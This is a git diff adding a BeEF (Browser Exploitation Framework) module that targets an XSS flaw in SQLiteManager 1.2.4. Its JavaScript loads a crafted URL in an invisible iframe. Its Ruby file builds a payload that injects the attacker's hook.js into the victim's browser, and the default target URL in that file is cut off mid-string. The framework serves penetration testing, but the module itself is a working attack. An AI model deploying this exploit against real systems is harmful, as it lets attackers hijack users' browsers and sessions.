diff --git a/modules/exploits/sqlitemanager_xss/command.js b/modules/exploits/sqlitemanager_xss/command.js new file mode 100644 index 000000000..c919b9bb6 --- /dev/null +++ b/modules/exploits/sqlitemanager_xss/command.js @@ -0,0 +1,17 @@ +// +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + + var uri = '<%= @uri.gsub(/'/, "\\'") %>'; + + var serendipity_iframe = beef.dom.createInvisibleIframe(); + serendipity_iframe.setAttribute('src', uri); + + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); + +}); + diff --git a/modules/exploits/sqlitemanager_xss/config.yaml b/modules/exploits/sqlitemanager_xss/config.yaml new file mode 100644 index 000000000..c1cb0a5a8 --- /dev/null +++ b/modules/exploits/sqlitemanager_xss/config.yaml @@ -0,0 +1,15 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + sqlitemanager_xss: + enable: true + category: ["Exploits", "XSS"] + name: "SQLiteManager XSS" + description: "Attempts to hook SQLiteManager using XSS.
Tested on version 1.2.4 however other versions are likely to be vulnerable." + authors: ["bcoles"] + target: + unknown: ["ALL"] diff --git a/modules/exploits/sqlitemanager_xss/module.rb b/modules/exploits/sqlitemanager_xss/module.rb new file mode 100644 index 000000000..970693e67 --- /dev/null +++ b/modules/exploits/sqlitemanager_xss/module.rb @@ -0,0 +1,23 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Sqlitemanager_xss < BeEF::Core::Command + + def self.options + + configuration = BeEF::Core::Configuration.instance + hook_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/hook.js" + + return [ + {'name' => 'uri', 'ui_label' => 'Target URL', 'value' => 'http://127.0.0.1/sqlite/index.php?dbsel=1"> @datastore['result']}) + end + +end